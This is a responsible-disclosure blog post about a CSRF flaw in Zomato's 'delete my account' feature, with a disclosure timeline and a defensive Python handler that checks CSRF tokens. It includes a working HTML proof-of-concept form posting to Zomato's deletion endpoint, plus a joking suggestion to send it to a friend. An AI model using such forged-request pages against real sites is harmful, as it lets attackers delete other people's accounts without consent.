Hi friends 😀,
Zomato is an online restaurant search and discovery service providing information on home delivery, dining-out, cafés and nightlife for various cities of India and 21 other countries. It has 62.5 million registered users.
It caught my interest, so I was messing around with Zomato. While checking out the settings section I found the "Delete my account" option, and after clicking on it a prompt like this appears:
To delete the account you have to type "delete" inside it and confirm. But there was a flaw: there was no CSRF token to validate the request!
What is a CSRF token?
A CSRF token is a protective measure used to prevent cross-site request forgery attacks: it lets the server check whether the request really came from the legitimate user's own session and page, or from a forged request issued by some other site.
Now the exploitation part
I created a quick working page that allows you to delete any user's account, so to delete his or her account you just need to send this code as an HTML page or as a link. 😛
<form action="https://www.zomato.com/php/delete_user_profile.php" method="POST">
<input type="hidden" name="reason" value="woot woot">
<input type="hidden" name="userid" value="[User ID to whom you wanna delete]">
<input type="submit" value="Submit request">
</form>
Video PoC:
Save this as delete.html and send it to your friend!
It was easy to grab any user's userid by just visiting their profile and copying the user id, which increased its severity 😉
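For contrast with the form above, here is what the missing server-side check looks like. This is an added example, not Zomato's code: a hypothetical delete-account handler that issues a per-session CSRF token, rejects any POST whose token does not match, requires the typed "delete" confirmation, and acts only on the logged-in session's own account instead of a client-supplied userid (session and form are modelled as plain dicts).

```python
import hmac
import secrets
from typing import Tuple

# Hypothetical model of a "delete my account" handler (added example).
# `session` holds the logged-in user's id plus a per-session CSRF token
# issued when the settings page was rendered; `form` is the parsed POST body.


def issue_csrf_token(session: dict) -> str:
    """Mint a random token, store it in the session, and return it to embed in the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def handle_delete_account(session: dict, form: dict) -> Tuple[int, str]:
    """Return an (HTTP status, message) pair for a delete-account POST."""
    expected = session.get("csrf_token")
    supplied = str(form.get("csrf_token", ""))
    # A forged cross-site form cannot know the session's token, so a missing or
    # mismatched token is rejected. compare_digest keeps the check constant-time;
    # bytes are used so a non-ASCII value cannot raise instead of failing cleanly.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"
    # Require the explicit confirmation text the UI asks the user to type.
    if str(form.get("confirm", "")).strip().lower() != "delete":
        return 400, "confirmation text not typed"
    # Never trust a client-supplied userid: only the session's own account may be deleted.
    if str(form.get("userid", "")) != str(session["user_id"]):
        return 403, "userid does not match the logged-in user"
    # Tokens are single-use: invalidate after a successful state-changing request.
    session.pop("csrf_token", None)
    return 200, "account %s deleted" % session["user_id"]
```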
[+] Fixing timeline
[+] July 21, 2015: Reported to CEO (report sent to Deepinder Goyal) and CTO
[+] July 21, 2015: Reported to support team
[+] Bug fixed by the team.
Let the #internet be a #safer place 🙂